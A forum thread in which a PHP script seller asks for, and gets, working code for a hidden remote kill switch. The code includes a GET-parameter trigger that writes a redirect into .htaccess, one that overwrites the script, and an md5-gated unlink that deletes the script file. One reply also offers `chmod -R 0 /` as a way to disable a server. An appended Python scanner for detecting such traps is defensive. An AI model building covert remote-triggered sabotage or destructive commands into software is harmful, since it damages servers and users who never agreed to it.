Is there a way to delete a PHP file currently in use?

Hello, I was thinking about selling a PHP script and building in a security feature that I could use to check to see if anybody else had sold it. If I found the script online without my copyrights in place, I could simply send some info to it and have it delete itself off of their server? Or possibly re-write itself?

Any chances this could be done? (I am aware that if the person selling or giving it away knows what they are doing, they could remove the security feature, but I'm banking that most wouldn't think to look.)

So, one of two options, could the script delete itself, or could you have it re-write itself?

Regards...
ziffgone Asked:

neester Commented:
Hmm...
Yeah you could I guess.
Something I would do would be simply APPEND to the .htaccess file (if it exists) or create the .htaccess file.
Then just whenever someone runs that PHP script, it will redirect them to an image on your webserver!
The person with the script will have no idea, since the .htaccess files are usually a mystery to the people running the website.

something simple like this:

if ($_GET['_ss_'] == 1)
{
   $myFile= fopen('.htaccess','a');
   $string = "ReWriteEngine On\n\nReWriteRule ^yourscriptname.php\S+ http://www.yourserver.com/stolenimage.jpg";
   fputs($myFile, $string);
}


Then you just load the stolen page, but add this to the URL: ?_ss_=1
And then it SHOULD disable the page from loading, and load your IMAGE instead :)
0
neester Commented:
Ahh sorry, forgot this:

fclose($myFile);


if ($_GET['_ss_'] == 1)
{
   $myFile= fopen('.htaccess','a');
   $string = "ReWriteEngine On\n\nReWriteRule ^yourscriptname.php\S+ http://www.yourserver.com/stolenimage.jpg";
   fputs($myFile, $string);
   fclose($myFile);
}
0

ziffgone Author Commented:
Hi neester,

The php page in question is being displayed in an iFrame within a parent page, this is the way it would likely be displayed everywhere, would this make a difference on the outcome?

The script works well in that it writes the .htaccess file to the directory, but when I call the parent page and it calls the php script, it is not redirecting to the "stolenimage.jpg" file.

Any ideas?

Regards...
0
neester Commented:
Ahhh ok.
Well add that script to the PARENT PHP file...
I think that would work...

If that doesn't work, I need some more info on what your script actually does??
0
_GeG_ Commented:
and you can rewrite/delete your own script. PHP loads the script before it is executed, so you could use this code:
<?php
if ($_GET['_ss_'] == 1){
    $myfile=file_get_contents('myfile.php');
    $fp=fopen('myfile.php', 'w');
    fwrite($fp, <<<EOS
<?php
header('Location:  http://www.yourserver.com/stolenimage.jpg');
exit;
?>
EOS
        );
    fclose($fp);
}
?>
You will have to add code to check file system permissions before doing that...
0
neester Commented:
>> _GeG_

yeah but see, the person running that script will EASILY be able to see what's wrong.
With my method - it hopefully will fool them into thinking there is some external validation...
0
_GeG_ Commented:
@neester
yes, but ;)
with your version, the person can look in the script to find out what happened and reverse it
with my version, there is no code left to analyze

@ziffgone
do you know of the ioncube php encoder?
0
neester Commented:
_GeG_

Yeah, but, if they have the code uploaded.
They would have it locally anyway.
The PHP Encoders are pretty good, but I don't know of a free one??
0
frugle Commented:
The best way to protect your script is to build in license-key checking and encrypt it with zend.

Any scripts I download and use I personally check for "bad things" before I put them anywhere near my server. It is a reasonably simple task to find and remove any instructions, or to see what the "input" required is, then wipe out the site of anyone else using your script. This will reflect badly on you.

A non-destructive way to mess with someone's site and/or server is to exec(`chmod -R 0 /`); and hope the webserver user hasn't been given elevated privs... it basically renders every file on the server that is changeable by the webserver (usually any files it has created itself) unreadable. It's fairly simple for a sysadmin to repair the damage as nothing is actually deleted or corrupted.

Mike
0
_GeG_ Commented:
@frugle
I agree that encoding is the best way to protect a script. But ioncube is cheaper than zend ;)

To prevent misuse of your own file deletion script, you can easily use md5, something like
if (md5($_GET['_ss_']) == '43afbdd58e3e32d2f27ea0fcb2c8d401'){
...
0
frugle Commented:
From that I take it the script would look like...

if (md5($_GET['_ss_']) == '43afbdd58e3e32d2f27ea0fcb2c8d401'){
    unlink($_SERVER['SCRIPT_FILENAME']);
}

If I remember rightly, on Linux servers, the physical file is loaded into memory then executed. It can therefore be unlinked prior to termination as the file is not locked open.

However, seeing this [unlink] line in an application will cause me to replace it with:

mail("me@mydomain.com", "ALERT!!!", "{$_SERVER['REMOTE_ADDR']} just tried to unlink file {$_SERVER['SCRIPT_FILENAME']} with command: {$_SERVER['QUERY_STRING']}");

I'd then be looking for REMOTE_ADDR with a large spoon.

Mike
0
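Added example (not code from any poster in this thread): a small Python audit pass of the kind frugle describes running before installing a third-party script. It flags request-controlled branches that lead to a file write, an .htaccess change, self-deletion or shell execution. The rule set, the 8-line window and the sample input are assumptions constructed for illustration, and regex heuristics like these miss obfuscated or encoded code.

```python
import re

# Heuristic rules for the kill-switch patterns quoted in this thread.
RULES = [
    ("request-gate", re.compile(r"\bif\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\s*\[")),
    ("hash-gate", re.compile(
        r"\b(md5|sha1|hash)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b.*"
        r"[=!]=+\s*['\"][0-9a-f]{32,}['\"]", re.I)),
    ("write-open", re.compile(r"\bfopen\s*\([^,]+,\s*['\"][waxc]\+?b?['\"]")),
    ("htaccess", re.compile(r"\.htaccess", re.I)),
    ("self-delete", re.compile(
        r"\bunlink\s*\(\s*(\$_SERVER\s*\[\s*['\"]SCRIPT_FILENAME['\"]\s*\]|__FILE__)")),
    ("shell", re.compile(r"\b(exec|system|shell_exec|passthru|popen)\s*\(|`[^`]+`")),
]
GATES = {"request-gate", "hash-gate"}
SINKS = {"write-open", "htaccess", "self-delete", "shell"}

def scan(source, window=8):
    """Return (findings, triggers): every rule hit as (line, rule), and every
    sink that sits within `window` lines after a request-controlled branch."""
    findings = [(no, rule) for no, line in enumerate(source.splitlines(), 1)
                for rule, rx in RULES if rx.search(line)]
    gates = sorted({no for no, rule in findings if rule in GATES})
    triggers = []
    for no, rule in findings:
        near = [g for g in gates if 0 <= no - g <= window]
        if rule in SINKS and near:
            triggers.append((near[-1], no, rule))
    return findings, triggers

# Constructed sample: ordinary page code plus the snippets posted in the thread.
SAMPLE = r'''<?php
$page = isset($_GET['page']) ? (int)$_GET['page'] : 1;
if ($_GET['_ss_'] == 1)
{
   $myFile= fopen('.htaccess','a');
   fclose($myFile);
}
if (md5($_GET['_ss_']) == '43afbdd58e3e32d2f27ea0fcb2c8d401'){
    unlink($_SERVER['SCRIPT_FILENAME']);
}
$log = fopen('visits.log', 'r');
'''

if __name__ == "__main__":
    findings, triggers = scan(SAMPLE)
    for gate, sink, rule in triggers:
        print(f"line {sink}: {rule} reachable from request-controlled branch at line {gate}")
```

Each trigger names the gating line, so a reviewer can see which request parameter controls the write or delete before deciding whether to strip it.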
_GeG_ Commented:
If you had bought the script, the spoon might be the right instrument ;)
... but if not...
0
ziffgone Author Commented:
Thank you all for your input, this has been an excellent lesson for me. I have decided to go with a mixture of most of what was said here.

_GeG_, your first post is essentially the solution I came to myself, so you get some points.

frugle, I have decided to go with your suggestion of md5, so you also get points.

And neester, you sent me in the right direction from the start, so the majority of the points are yours.

Thanks all. :)

Regards...
0